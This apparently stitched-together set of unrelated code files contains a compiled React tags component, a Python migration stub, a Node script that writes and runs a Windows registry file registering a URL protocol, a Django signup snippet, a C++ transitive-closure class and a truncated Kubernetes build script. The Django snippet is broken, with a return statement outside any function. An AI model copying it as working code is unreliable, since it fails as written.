function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; };
return extendStatics(d, b);
};
return function (d, b) {
extendStatics(d, b);
function __() { this.constructor = d; }
d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
};
})();
var __assign = (this && this.__assign) || function () {
__assign = Object.assign || function(t) {
for (var s, i = 1, n = arguments.length; i < n; i++) {
s = arguments[i];
for (var p in s) if (Object.prototype.hasOwnProperty.call(s, p))
t[p] = s[p];
}
return t;
};
return __assign.apply(this, arguments);
};
var __rest = (this && this.__rest) || function (s, e) {
var t = {};
for (var p in s) if (Object.prototype.hasOwnProperty.call(s, p) && e.indexOf(p) < 0)
t[p] = s[p];
if (s != null && typeof Object.getOwnPropertySymbols === "function")
for (var i = 0, p = Object.getOwnPropertySymbols(s); i < p.length; i++) {
if (e.indexOf(p[i]) < 0 && Object.prototype.propertyIsEnumerable.call(s, p[i]))
t[p[i]] = s[p[i]];
}
return t;
};
import React, { Component } from 'react';
import { findDOMNode } from 'react-dom';
import { Box, Keyboard, Text, } from 'grommet';
import { FormClose } from 'grommet-icons/icons/FormClose';
import { Tag } from '../Tag';
export var TagsSelect = function (props) {
var _a = props || { tagProps: {} }, tagProps = _a.tagProps, rest = __rest(_a, ["tagProps"]);
return function (_a) {
var placeholder = _a.placeholder, value = _a.value, onChange = _a.onChange;
return (React.createElement(Tags, __assign({ focusable: false, placeholder: placeholder, value: value, onChange: onChange, tagProps: __assign({}, tagProps, { onClick: function (e) { return e.stopPropagation(); } }) }, rest)));
};
};
/**
* A list of tags that can be removed<b/>
* `import { Tags } from 'grommet-controls';`<b/>
* `<Tags />`<b/>
*/
var Tags = /** @class */ (function (_super) {
__extends(Tags, _super);
function Tags() {
var _this = _super !== null && _super.apply(this, arguments) || this;
_this.state = {
selectedTagIndex: -1,
};
_this.tagRefs = [];
_this.elementRef = React.createRef();
_this.selectTag = function (selected) {
var _a = _this.props, onChange = _a.onChange, value = _a.value;
if (onChange) {
var tags = selected;
if (Array.isArray(value)) {
var index = value.indexOf(tags);
if (index !== -1) {
tags = value.filter(function (item) { return item !== selected; });
}
else {
tags = value.concat([tags]);
}
}
else {
tags = [tags];
}
onChange({ target: findDOMNode(_this.elementRef.current), option: selected, value: tags });
}
};
_this.onNextTag = function (event) {
var value = _this.props.value;
var selectedTagIndex = _this.state.selectedTagIndex;
event.preventDefault();
var index = selectedTagIndex + 1;
if (index >= value.length) {
index = 0;
}
_this.focusTag(index);
};
_this.onPreviousTag = function (event) {
var selectedTagIndex = _this.state.selectedTagIndex;
var value = _this.props.value;
event.preventDefault();
var index = selectedTagIndex - 1;
if (index < 0) {
index = value.length - 1;
}
_this.focusTag(index);
};
_this.onSelectTag = function (event) {
var value = _this.props.value;
var selectedTagIndex = _this.state.selectedTagIndex;
if (selectedTagIndex >= 0 && selectedTagIndex < value.length) {
event.preventDefault(); // prevent submitting forms
event.stopPropagation();
_this.selectTag(value[selectedTagIndex]);
}
};
_this.onCloseClick = function (e, tag) {
e.stopPropagation();
_this.selectTag(tag);
};
return _this;
}
Tags.prototype.focusTag = function (index) {
if (index >= 0 && index < this.tagRefs.length) {
var tagElement = findDOMNode(this.tagRefs[index].current);
if (tagElement && typeof tagElement.focus === 'function') {
tagElement.focus();
}
this.setState({ selectedTagIndex: index });
}
};
Tags.prototype.render = function () {
var _this = this;
var _a = this.props, placeholder = _a.placeholder, children = _a.children, value = _a.value, onChange = _a.onChange, focusable = _a.focusable, onClick = _a.onClick, direction = _a.direction, icon = _a.icon, tagProps = _a.tagProps, rest = __rest(_a, ["placeholder", "children", "value", "onChange", "focusable", "onClick", "direction", "icon", "tagProps"]);
var noValues;
if ((!value || (Array.isArray(value) && value.length === 0))) {
noValues = React.isValidElement(placeholder) ? placeholder : (
// placeholder. minimum height of icon to keep size
React.createElement(Text, { color: 'placeholder', style: { minHeight: '24px' } }, placeholder || 'No selection'));
}
var values;
if (Array.isArray(value)) {
values = value;
}
else {
values = value ? [value] : [];
}
return (React.createElement(Keyboard, { onEnter: this.onSelectTag, onSpace: this.onSelectTag, onLeft: this.onPreviousTag, onRight: this.onNextTag },
React.createElement(Box, __assign({ tabIndex: focusable ? 0 : undefined, ref: this.elementRef, direction: direction, overflow: 'auto', style: { minWidth: 'auto' } }, rest), noValues || values.map(function (tag, index) {
if (children) {
return children(tag, index, value);
}
if (!_this.tagRefs[index]) {
_this.tagRefs[index] = React.createRef();
}
return (React.createElement(Tag, __assign({ key: "tag_" + tag + "_" + index, ariaChecked: true, a11yTitle: "Remove " + tag.toString(), label: typeof tag !== 'object' ? tag.toString() : undefined, ref: _this.tagRefs[index], onClick: onClick ? function (e) { return onClick(e, tag); } : undefined, onChange: onChange ? function (e) { return _this.onCloseClick(e, tag); } : undefined, icon: icon }, (typeof tag === 'object' ? __assign({}, tagProps, tag) : tagProps))));
}))));
};
Tags.defaultProps = {
pad: 'small',
focusable: true,
margin: { horizontal: 'xsmall', vertical: 'small' },
value: [],
gap: 'xsmall',
direction: 'row-responsive',
icon: React.createElement(FormClose, null),
};
return Tags;
}(Component));
export { Tags };
|
class Migration:
def __init__(self):
self.migration_tasks = []
def create_migration(self, migration_name):
self.migration_tasks.append(migration_name)
def run_migrations(self):
for task in self.migration_tasks:
print(f"Running migration: {task}")
# Demonstration of usage
migration_manager = Migration()
migration_manager.create_migration("CreateUsersTable")
migration_manager.create_migration("CreatePostsTable")
migration_manager.run_migrations() |
// 要先寫入bat,然後再來呼叫?
// http://blog.pulipuli.info/2017/03/windowssystem-protocol-open-windows.html?m=1
const fs = require('fs');
var dirname = process.execPath
dirname = dirname.slice(0, dirname.lastIndexOf("\\") + 1)
var exePath = dirname + "\\open-chrome-app.exe"
exePath = exePath.replace("\\", "\\\\")
var reg = `Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\chrome-app]
@="URL:Chrome APP mode"
"URL Protocol"=""
[HKEY_CLASSES_ROOT\chrome-app\DefaultIcon]
@="` + exePath + `"
[HKEY_CLASSES_ROOT\chrome-app\shell]
@=""
[HKEY_CLASSES_ROOT\chrome-app\shell\open]
@=""
[HKEY_CLASSES_ROOT\chrome-app\shell\open\command]
@="` + exePath + ` \"%1\""`
var regFilePath = "register-system-protocol.reg"
fs.writeFile("register-system-protocol.reg", reg, function(err) {
if(err) {
return console.log(err);
}
//console.log("The file was saved!");
const { exec } = require('child_process');
exec(regFilePath)
}); |
from django.contrib.auth.forms import UserCreationForm
class SignUpForm(UserCreationForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.fields['username'].label = 'Display Name'
self.fields['email'].label = 'Email Address'
form = SignUpForm(data=request.POST or None)
if form.is_valid():
new_user = form.save(commit=False)
new_user.save()
return render(request, 'register.html', {'form': form}) |
<reponame>phisco/advance_algorithms_project<filename>my_transitive_closure.cpp
#include "include_and_types.cpp"
#include <set>
#include <boost/graph/detail/set_adaptor.hpp>
typedef graph_traits<Graph>::adjacency_iterator adj_iter;
template <class Root, class InComponent, class Num, class Set>
class TransitiveClosure{
private:
//Graph
Graph*g;
//Property Map instances
Root root;
InComponent inComp;
Num num;
Set succ;
int index;
//Data Structure feeding Property Map instances
std::vector<Vertex> rootVet;
std::vector<bool> inCompVet;
std::vector<std::set<Vertex>*> sets;
std::vector<int> numVet;
std::vector<std::set<Vertex>> vect;
std::stack<Vertex> s;
/**
* This function is the body of the algorithm. It takes the vertex that the procedure is visiting in that time
* and calculates its successors.
* This is the C++ implementation of the pseudocode available on the Nuutila's paper
* @param v, vertex visited
*/
void tc(Vertex v){
++index;
put(root, v, v);
put(inComp, v, false);
put(num, v, index);
put(succ,v,&vect[v]);
std::set<Vertex> roots;
adj_iter ai, a_end;
for(boost::tie(ai, a_end)= adjacent_vertices(v,*g); ai!=a_end;++ai){
Vertex w=*ai;
if(get(num,w)==0)//Checking if w is already visited
tc(w);
if(!get(inComp,get(root,w)))//Checking if w's root is already in a SCC
put(root, v, get(num, get(root,w))<get(num,get(root,v)) ? get(root,w) : get(root,v));
else
//complexity logaritmic in size
roots.insert(get(root,w));
}
std::set<Vertex>::iterator it;
//complexity of set_union: 2*(size_set1+size_set2)-1
//This loop inserts all the vertex in roots and their successors in v's root successors
for(it=roots.begin();it!=roots.end();++it){
Vertex r=*it;
std::set<Vertex>* succRoot=get(succ, get(root,v));
set_union(get(succ,r)->begin(),get(succ,r)->end(),succRoot->begin(), succRoot->end(),
std::inserter(*succRoot,succRoot->begin()));
succRoot->insert(r);
}
if(get(root,v)==v){
if(get(num,s.top())>=get(num,v)){
get(succ,v)->insert(v);
do{
Vertex w=s.top();
s.pop();
put(inComp,w,true);
if(v!=w){
//Pointer assignment, not a copy
std::set_union(get(succ,w)->begin(),get(succ,w)->end(),get(succ,v)->begin(),
get(succ,v)->end(),std::inserter(*get(succ,v),get(succ,v)->begin()));
put(succ,w, get(succ,v));
}
}while(get(num,s.top())>=get(num,v));
}else{
//if a vertex is root of a trivial SCC
put(inComp,v,true);
}
}else{
//If a vertex is not a root, it pushes his root into the stack, if it is not
if(get(num,s.top())!=get(num, get(root,v)))
s.push(get(root,v));
get(succ,get(root,v))->insert(v);
}
}
/**
* This function launches the procedure and it performs the visit of all the graph's vertex
*/
void transitive_closure_main(){
vertex_iter vi,v_end;
timer::auto_cpu_timer t;
for(boost::tie(vi,v_end)=vertices(*g);vi!=v_end;++vi){
Vertex v=*vi;
if(get(num,v)==0){
tc(v);
}
}
};
public:
/**
* This is the constructor of the TransitiveClosure class. It takes the reference of the already allocated graph
* done by the caller (main_transitive_closure.cpp).
* The constructor initializes all the class attributes in proper way
* @param graph pointer
*/
TransitiveClosure(Graph*graph){
g=graph;
//Insertion and handling of a new vertex with lowest num possible in order to accomplish algorithm correctness
Vertex starter=add_vertex(*g);
int n=num_vertices(*g);
numVet=*new std::vector<int>(n);
num=make_iterator_property_map(numVet.begin(),get(vertex_index,*g));
put(num, starter, -1);
s.push(starter);
remove_vertex(starter,*g);
//Updating number of graph's vertices
n--;
//data structures allocation
rootVet.resize(n);
inCompVet.resize(n);
sets.resize(n);
vect.resize(n);
//Properties instantiation
root=make_iterator_property_map(rootVet.begin(), get(vertex_index,*g));
inComp= make_iterator_property_map(inCompVet.begin(), get(vertex_index,*g));
succ=make_iterator_property_map(sets.begin(),get(vertex_index,*g));
//index needed
index=0;
}
/**
* This function is called by the main_transitive_closure callee. It launches the procedure and prints the
* procedure's result when it is done.
*/
void transitive_closure_scc(){
//Execution of the procedure
transitive_closure_main();
//Printing our results
std::cout << "Ours" << std::endl;
IndexMap index = get(vertex_index,*g);
vertex_iter it, it_end;
for(boost::tie(it,it_end)=vertices(*g);it!=it_end;++it){
Vertex v=*it;
std::set<Vertex>* set=get(succ,get(root,v));
std::cout << index[*it] << " --> ";
std::set<Vertex>::iterator i;
for(i=set->begin();i!=set->end();++i){
std::cout << *i << " ";
}
std::cout << std::endl;
}
}
};
|
#!/bin/bash
# Copyright 2014 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The golang package that we are building.
readonly KUBE_GO_PACKAGE=k8s.io/kubernetes
readonly KUBE_GOPATH="${KUBE_OUTPUT}/go"
# Load contrib target functions
if [ -n "${KUBERNETES_CONTRIB:-}" ]; then
for contrib in "${KUBERNETES_CONTRIB}"; do
source "${KUBE_ROOT}/contrib/${contrib}/target.sh"
done
fi
# The set of server targets that we are only building for Linux
# Note: if you are adding something here, you might need to add it to
# kube::build::source_targets in build/common.sh as well.
kube::golang::server_targets() {
local targets=(
cmd/kube-dns
cmd/kube-proxy
cmd/kube-apiserver
cmd/kube-controller-manager
cmd/kubelet
cmd/kubemark
cmd/hyperkube
federation/cmd/federation-apiserver
federation/cmd/federation-controller-manager
plugin/cmd/kube-scheduler
)
if [ -n "${KUBERNETES_CONTRIB:-}" ]; then
for contrib in "${KUBERNETES_CONTRIB}"; do
targets+=($(eval "kube::contrib::${contrib}::server_targets"))
done
fi
echo "${targets[@]}"
}
readonly KUBE_SERVER_TARGETS=($(kube::golang::server_targets))
readonly KUBE_SERVER_BINARIES=("${KUBE_SERVER_TARGETS[@]##*/}")
if [[ "${KUBE_FASTBUILD:-}" == "true" ]]; then
readonly KUBE_SERVER_PLATFORMS=(linux/amd64)
if [[ "${KUBE_BUILDER_OS:-}" == "darwin"* ]]; then
readonly KUBE_TEST_PLATFORMS=(
darwin/amd64
linux/amd64
)
readonly KUBE_CLIENT_PLATFORMS=(
darwin/amd64
linux/amd64
)
else
readonly KUBE_TEST_PLATFORMS=(linux/amd64)
readonly KUBE_CLIENT_PLATFORMS=(linux/amd64)
fi
else
# The server platform we are building on.
readonly KUBE_SERVER_PLATFORMS=(
linux/amd64
linux/arm
linux/arm64
linux/ppc64le # note: hyperkube is temporarily disabled due to a linking error
)
# If we update this we should also update the set of golang compilers we build
# in 'build/build-image/cross/Dockerfile'. However, it's only a bit faster since go 1.5, not mandatory
readonly KUBE_CLIENT_PLATFORMS=(
linux/amd64
linux/386
linux/arm
linux/arm64
linux/ppc64le
darwin/amd64
darwin/386
windows/amd64
windows/386
)
# Which platforms we should compile test targets for. Not all client platforms need these tests
readonly KUBE_TEST_PLATFORMS=(
linux/amd64
darwin/amd64
windows/amd64
linux/arm
)
fi
# The set of client targets that we are building for all platforms
readonly KUBE_CLIENT_TARGETS=(
cmd/kubectl
)
readonly KUBE_CLIENT_BINARIES=("${KUBE_CLIENT_TARGETS[@]##*/}")
readonly KUBE_CLIENT_BINARIES_WIN=("${KUBE_CLIENT_BINARIES[@]/%/.exe}")
# The set of test targets that we are building for all platforms
kube::golang::test_targets() {
local targets=(
cmd/gendocs
cmd/genkubedocs
cmd/genman
cmd/genyaml
cmd/mungedocs
cmd/genswaggertypedocs
cmd/linkcheck
examples/k8petstore/web-server/src
federation/cmd/genfeddocs
vendor/github.com/onsi/ginkgo/ginkgo
test/e2e/e2e.test
test/e2e_node/e2e_node.test
)
if [ -n "${KUBERNETES_CONTRIB:-}" ]; then
for contrib in "${KUBERNETES_CONTRIB}"; do
targets+=($(eval "kube::contrib::${contrib}::test_targets"))
done
fi
echo "${targets[@]}"
}
readonly KUBE_TEST_TARGETS=($(kube::golang::test_targets))
readonly KUBE_TEST_BINARIES=("${KUBE_TEST_TARGETS[@]##*/}")
readonly KUBE_TEST_BINARIES_WIN=("${KUBE_TEST_BINARIES[@]/%/.exe}")
readonly KUBE_TEST_PORTABLE=(
test/e2e/testing-manifests
test/kubemark
hack/e2e.go
hack/e2e-internal
hack/get-build.sh
hack/ginkgo-e2e.sh
hack/federated-ginkgo-e2e.sh
hack/lib
)
# Gigabytes desired for parallel platform builds. 11 is fairly
# arbitrary, but is a reasonable splitting point for 2015
# laptops-versus-not.
#
# If you are using boot2docker, the following seems to work (note
# that 12000 rounds to 11G):
# boot2docker down
# VBoxManage modifyvm boot2docker-vm --memory 12000
# boot2docker up
readonly KUBE_PARALLEL_BUILD_MEMORY=11
readonly KUBE_ALL_TARGETS=(
"${KUBE_SERVER_TARGETS[@]}"
"${KUBE_CLIENT_TARGETS[@]}"
"${KUBE_TEST_TARGETS[@]}"
)
readonly KUBE_ALL_BINARIES=("${KUBE_ALL_TARGETS[@]##*/}")
readonly KUBE_STATIC_LIBRARIES=(
kube-apiserver
kube-controller-manager
kube-dns
kube-scheduler
kube-proxy
kubectl
federation-apiserver
federation-controller-manager
)
kube::golang::is_statically_linked_library() {
local e
for e in "${KUBE_STATIC_LIBRARIES[@]}"; do [[ "$1" == *"/$e" ]] && return 0; done;
# Allow individual overrides--e.g., so that you can get a static build of
# kubectl for inclusion in a container.
if [ -n "${KUBE_STATIC_OVERRIDES:+x}" ]; then
for e in "${KUBE_STATIC_OVERRIDES[@]}"; do [[ "$1" == *"/$e" ]] && return 0; done;
fi
return 1;
}
# kube::binaries_from_targets take a list of build targets and return the
# full go package to be built
kube::golang::binaries_from_targets() {
local target
for target; do
# If the target starts with what looks like a domain name, assume it has a
# fully-qualified package name rather than one that needs the Kubernetes
# package prepended.
if [[ "${target}" =~ ^([[:alnum:]]+".")+[[:alnum:]]+"/" ]]; then
echo "${target}"
else
echo "${KUBE_GO_PACKAGE}/${target}"
fi
done
}
# Asks golang what it thinks the host platform is. The go tool chain does some
# slightly different things when the target platform matches the host platform.
kube::golang::host_platform() {
echo "$(go env GOHOSTOS)/$(go env GOHOSTARCH)"
}
kube::golang::current_platform() {
local os="${GOOS-}"
if [[ -z $os ]]; then
os=$(go env GOHOSTOS)
fi
local arch="${GOARCH-}"
if [[ -z $arch ]]; then
arch=$(go env GOHOSTARCH)
fi
echo "$os/$arch"
}
# Takes the the platform name ($1) and sets the appropriate golang env variables
# for that platform.
kube::golang::set_platform_envs() {
[[ -n ${1-} ]] || {
kube::log::error_exit "!!! Internal error. No platform set in kube::golang::set_platform_envs"
}
export GOOS=${platform%/*}
export GOARCH=${platform##*/}
# Do not set CC when building natively on a platform, only if cross-compiling from linux/amd64
if [[ $(kube::golang::host_platform) == "linux/amd64" ]]; then
# Dynamic CGO linking for other server architectures than linux/amd64 goes here
# If you want to include support for more server platforms than these, add arch-specific gcc names here
if [[ ${platform} == "linux/arm" ]]; then
export CGO_ENABLED=1
export CC=arm-linux-gnueabi-gcc
elif [[ ${platform} == "linux/arm64" ]]; then
export CGO_ENABLED=1
export CC=aarch64-linux-gnu-gcc
elif [[ ${platform} == "linux/ppc64le" ]]; then
export CGO_ENABLED=1
export CC=powerpc64le-linux-gnu-gcc
fi
fi
}
kube::golang::unset_platform_envs() {
unset GOOS
unset GOARCH
unset CGO_ENABLED
unset CC
}
# Create the GOPATH tree under $KUBE_OUTPUT
kube::golang::create_gopath_tree() {
local go_pkg_dir="${KUBE_GOPATH}/src/${KUBE_GO_PACKAGE}"
local go_pkg_basedir=$(dirname "${go_pkg_dir}")
mkdir -p "${go_pkg_basedir}"
rm -f "${go_pkg_dir}"
# TODO: This symlink should be relative.
ln -s "${KUBE_ROOT}" "${go_pkg_dir}"
}
# Ensure the godep tool exists and is a viable version.
kube::golang::verify_godep_version() {
local -a godep_version_string
local godep_version
local godep_min_version="63"
if ! which godep &>/dev/null; then
kube::log::usage_from_stdin <<EOF
Can't find 'godep' in PATH, please fix and retry.
See https://github.com/kubernetes/kubernetes/blob/master/docs/devel/development.md#godep-and-dependency-management for installation instructions.
EOF
return 2
fi
godep_version_string=($(godep version))
godep_version=${godep_version_string[1]/v/}
if ((godep_version<$godep_min_version)); then
kube::log::usage_from_stdin <<EOF
Detected godep version: ${godep_version_string[*]}.
Kubernetes requires godep v$godep_min_version or greater.
Please update:
go get -u github.com/tools/godep
EOF
return 2
fi
}
# Ensure the go tool exists and is a viable version.
kube::golang::verify_go_version() {
if [[ -z "$(which go)" ]]; then
kube::log::usage_from_stdin <<EOF
Can't find 'go' in PATH, please fix and retry.
See http://golang.org/doc/install for installation instructions.
EOF
return 2
fi
local go_version
go_version=($(go version))
if [[ "${go_version[2]}" < "go1.6" && "${go_version[2]}" != "devel" ]]; then
kube::log::usage_from_stdin <<EOF
Detected go version: ${go_version[*]}.
Kubernetes requires go version 1.6 or greater.
Please install Go version 1.6 or later.
EOF
return 2
fi
}
# kube::golang::setup_env will check that the `go` commands is available in
# ${PATH}. It will also check that the Go version is good enough for the
# Kubernetes build.
#
# Inputs:
# KUBE_EXTRA_GOPATH - If set, this is included in created GOPATH
#
# Outputs:
# env-var GOPATH points to our local output dir
# env-var GOBIN is unset (we want binaries in a predictable place)
# env-var GO15VENDOREXPERIMENT=1
# current directory is within GOPATH
kube::golang::setup_env() {
kube::golang::verify_go_version
kube::golang::create_gopath_tree
export GOPATH=${KUBE_GOPATH}
# Append KUBE_EXTRA_GOPATH to the GOPATH if it is defined.
if [[ -n ${KUBE_EXTRA_GOPATH:-} ]]; then
GOPATH="${GOPATH}:${KUBE_EXTRA_GOPATH}"
fi
# Change directories so that we are within the GOPATH. Some tools get really
# upset if this is not true. We use a whole fake GOPATH here to collect the
# resultant binaries. Go will not let us use GOBIN with `go install` and
# cross-compiling, and `go install -o <file>` only works for a single pkg.
local subdir
subdir=$(kube::realpath . | sed "s|$KUBE_ROOT||")
cd "${KUBE_GOPATH}/src/${KUBE_GO_PACKAGE}/${subdir}"
# Unset GOBIN in case it already exists in the current session.
unset GOBIN
# This seems to matter to some tools (godep, ugorji, ginkgo...)
export GO15VENDOREXPERIMENT=1
}
# This will take binaries from $GOPATH/bin and copy them to the appropriate
# place in ${KUBE_OUTPUT_BINDIR}
#
# Ideally this wouldn't be necessary and we could just set GOBIN to
# KUBE_OUTPUT_BINDIR but that won't work in the face of cross compilation. 'go
# install' will place binaries that match the host platform directly in $GOBIN
# while placing cross compiled binaries into `platform_arch` subdirs. This
# complicates pretty much everything else we do around packaging and such.
kube::golang::place_bins() {
local host_platform
host_platform=$(kube::golang::host_platform)
kube::log::status "Placing binaries"
local platform
for platform in "${KUBE_CLIENT_PLATFORMS[@]}"; do
# The substitution on platform_src below will replace all slashes with
# underscores. It'll transform darwin/amd64 -> darwin_amd64.
local platform_src="/${platform//\//_}"
if [[ $platform == $host_platform ]]; then
platform_src=""
fi
local full_binpath_src="${KUBE_GOPATH}/bin${platform_src}"
if [[ -d "${full_binpath_src}" ]]; then
mkdir -p "${KUBE_OUTPUT_BINPATH}/${platform}"
find "${full_binpath_src}" -maxdepth 1 -type f -exec \
rsync -pt {} "${KUBE_OUTPUT_BINPATH}/${platform}" \;
fi
done
}
kube::golang::fallback_if_stdlib_not_installable() {
local go_root_dir=$(go env GOROOT);
local go_host_os=$(go env GOHOSTOS);
local go_host_arch=$(go env GOHOSTARCH);
local cgo_pkg_dir=${go_root_dir}/pkg/${go_host_os}_${go_host_arch}_cgo;
if [ -e ${cgo_pkg_dir} ]; then
return 0;
fi
if [ -w ${go_root_dir}/pkg ]; then
return 0;
fi
kube::log::status "+++ Warning: stdlib pkg with cgo flag not found.";
kube::log::status "+++ Warning: stdlib pkg cannot be rebuilt since ${go_root_dir}/pkg is not writable by `whoami`";
kube::log::status "+++ Warning: Make ${go_root_dir}/pkg writable for `whoami` for a one-time stdlib install, Or"
kube::log::status "+++ Warning: Rebuild stdlib using the command 'CGO_ENABLED=0 go install -a -installsuffix cgo std'";
kube::log::status "+++ Falling back to go build, which is slower";
use_go_build=true
}
# Builds the toolchain necessary for building kube. This needs to be
# built only on the host platform.
# TODO: This builds only the `teststale` binary right now. As we expand
# this function's capabilities we need to find this a right home.
# Ideally, not a shell script because testing shell scripts is painful.
kube::golang::build_kube_toolchain() {
local targets=(
hack/cmd/teststale
)
local binaries
binaries=($(kube::golang::binaries_from_targets "${targets[@]}"))
kube::log::status "Building the toolchain targets:" "${binaries[@]}"
go install "${goflags[@]:+${goflags[@]}}" \
-ldflags "${goldflags}" \
"${binaries[@]:+${binaries[@]}}"
}
# Try and replicate the native binary placement of go install without
# calling go install.
kube::golang::output_filename_for_binary() {
local binary=$1
local platform=$2
local output_path="${KUBE_GOPATH}/bin"
if [[ $platform != $host_platform ]]; then
output_path="${output_path}/${platform//\//_}"
fi
local bin=$(basename "${binary}")
if [[ ${GOOS} == "windows" ]]; then
bin="${bin}.exe"
fi
echo "${output_path}/${bin}"
}
kube::golang::build_binaries_for_platform() {
local platform=$1
local use_go_build=${2-}
local -a statics=()
local -a nonstatics=()
local -a tests=()
for binary in "${binaries[@]}"; do
# TODO(IBM): Enable hyperkube builds for ppc64le again
# The current workaround creates a text file with help text instead of a binary
# We're doing it this way so the build system isn't affected so much
if [[ "${binary}" == *"hyperkube" && "${platform}" == "linux/ppc64le" ]]; then
echo "hyperkube build for ppc64le is disabled. Creating dummy text file instead."
local outfile=$(kube::golang::output_filename_for_binary "${binary}" "${platform}")
mkdir -p $(dirname ${outfile})
echo "Not available at the moment. Please see: https://github.com/kubernetes/kubernetes/issues/25886 for more information." > ${outfile}
elif [[ "${binary}" =~ ".test"$ ]]; then
tests+=($binary)
elif kube::golang::is_statically_linked_library "${binary}"; then
statics+=($binary)
else
nonstatics+=($binary)
fi
done
if [[ "${#statics[@]}" != 0 ]]; then
kube::golang::fallback_if_stdlib_not_installable;
fi
if [[ -n ${use_go_build:-} ]]; then
kube::log::progress " "
for binary in "${statics[@]:+${statics[@]}}"; do
local outfile=$(kube::golang::output_filename_for_binary "${binary}" "${platform}")
CGO_ENABLED=0 go build -o "${outfile}" \
"${goflags[@]:+${goflags[@]}}" \
-ldflags "${goldflags}" \
"${binary}"
kube::log::progress "*"
done
for binary in "${nonstatics[@]:+${nonstatics[@]}}"; do
local outfile=$(kube::golang::output_filename_for_binary "${binary}" "${platform}")
go build -o "${outfile}" \
"${goflags[@]:+${goflags[@]}}" \
-ldflags "${goldflags}" \
"${binary}"
kube::log::progress "*"
done
kube::log::progress "\n"
else
# Use go install.
if [[ "${#nonstatics[@]}" != 0 ]]; then
go install "${goflags[@]:+${goflags[@]}}" \
-ldflags "${goldflags}" \
"${nonstatics[@]:+${nonstatics[@]}}"
fi
if [[ "${#statics[@]}" != 0 ]]; then
CGO_ENABLED=0 go install -installsuffix cgo "${goflags[@]:+${goflags[@]}}" \
-ldflags "${goldflags}" \
"${statics[@]:+${statics[@]}}"
fi
fi
for test in "${tests[@]:+${tests[@]}}"; do
local outfile=$(kube::golang::output_filename_for_binary "${test}" \
"${platform}")
local testpkg="$(dirname ${test})"
# Staleness check always happens on the host machine, so we don't
# have to locate the `teststale` binaries for the other platforms.
# Since we place the host binaries in `$KUBE_GOPATH/bin`, we can
# assume that the binary exists there, if it exists at all.
# Otherwise, something has gone wrong with building the `teststale`
# binary and we should safely proceed building the test binaries
# assuming that they are stale. There is no good reason to error
# out.
if test -x "${KUBE_GOPATH}/bin/teststale" && ! "${KUBE_GOPATH}/bin/teststale" -binary "${outfile}" -package "${testpkg}"
then
continue
fi
# `go test -c` below directly builds the binary. It builds the packages,
# but it never installs them. `go test -i` only installs the dependencies
# of the test, but not the test package itself. So neither `go test -c`
# nor `go test -i` installs, for example, test/e2e.a. And without that,
# doing a staleness check on k8s.io/kubernetes/test/e2e package always
# returns true (always stale). And that's why we need to install the
# test package.
go install "${goflags[@]:+${goflags[@]}}" \
-ldflags "${goldflags}" \
"${testpkg}"
mkdir -p "$(dirname ${outfile})"
go test -c \
"${goflags[@]:+${goflags[@]}}" \
-ldflags "${goldflags}" \
-o "${outfile}" \
"${testpkg}"
done
}
# Return approximate physical memory available in gigabytes.
kube::golang::get_physmem() {
local mem
# Linux kernel version >=3.14, in kb
if mem=$(grep MemAvailable /proc/meminfo | awk '{ print $2 }'); then
echo $(( ${mem} / 1048576 ))
return
fi
# Linux, in kb
if mem=$(grep MemTotal /proc/meminfo | awk '{ print $2 }'); then
echo $(( ${mem} / 1048576 ))
return
fi
# OS X, in bytes. Note that get_physmem, as used, should only ever
# run in a Linux container (because it's only used in the multiple
# platform case, which is a Dockerized build), but this is provided
# for completeness.
if mem=$(sysctl -n hw.memsize 2>/dev/null); then
echo $(( ${mem} / 1073741824 ))
return
fi
# If we can't infer it, just give up and assume a low memory system
echo 1
}
# Build binaries targets specified
#
# Input:
# $@ - targets and go flags. If no targets are set then all binaries targets
# are built.
# KUBE_BUILD_PLATFORMS - Incoming variable of targets to build for. If unset
# then just the host architecture is built.
kube::golang::build_binaries() {
# Create a sub-shell so that we don't pollute the outer environment
(
# Check for `go` binary and set ${GOPATH}.
kube::golang::setup_env
echo "Go version: $(go version)"
local host_platform
host_platform=$(kube::golang::host_platform)
# Use eval to preserve embedded quoted strings.
local goflags goldflags
eval "goflags=(${KUBE_GOFLAGS:-})"
goldflags="${KUBE_GOLDFLAGS:-} $(kube::version::ldflags)"
local use_go_build
local -a targets=()
local arg
for arg; do
if [[ "${arg}" == "--use_go_build" ]]; then
use_go_build=true
elif [[ "${arg}" == -* ]]; then
# Assume arguments starting with a dash are flags to pass to go.
goflags+=("${arg}")
else
targets+=("${arg}")
fi
done
if [[ ${#targets[@]} -eq 0 ]]; then
targets=("${KUBE_ALL_TARGETS[@]}")
fi
local -a platforms=("${KUBE_BUILD_PLATFORMS[@]:+${KUBE_BUILD_PLATFORMS[@]}}")
if [[ ${#platforms[@]} -eq 0 ]]; then
platforms=("${host_platform}")
fi
local binaries
binaries=($(kube::golang::binaries_from_targets "${targets[@]}"))
local parallel=false
if [[ ${#platforms[@]} -gt 1 ]]; then
local gigs
gigs=$(kube::golang::get_physmem)
if [[ ${gigs} -ge ${KUBE_PARALLEL_BUILD_MEMORY} ]]; then
kube::log::status "Multiple platforms requested and available ${gigs}G >= threshold ${KUBE_PARALLEL_BUILD_MEMORY}G, building platforms in parallel"
parallel=true
else
kube::log::status "Multiple platforms requested, but available ${gigs}G < threshold ${KUBE_PARALLEL_BUILD_MEMORY}G, building platforms in serial"
parallel=false
fi
fi
# First build the toolchain before building any other targets
kube::golang::build_kube_toolchain
if [[ "${parallel}" == "true" ]]; then
kube::log::status "Building go targets for ${platforms[@]} in parallel (output will appear in a burst when complete):" "${targets[@]}"
local platform
for platform in "${platforms[@]}"; do (
kube::golang::set_platform_envs "${platform}"
kube::log::status "${platform}: go build started"
kube::golang::build_binaries_for_platform ${platform} ${use_go_build:-}
kube::log::status "${platform}: go build finished"
) &> "/tmp//${platform//\//_}.build" &
done
local fails=0
for job in $(jobs -p); do
wait ${job} || let "fails+=1"
done
for platform in "${platforms[@]}"; do
cat "/tmp//${platform//\//_}.build"
done
exit ${fails}
else
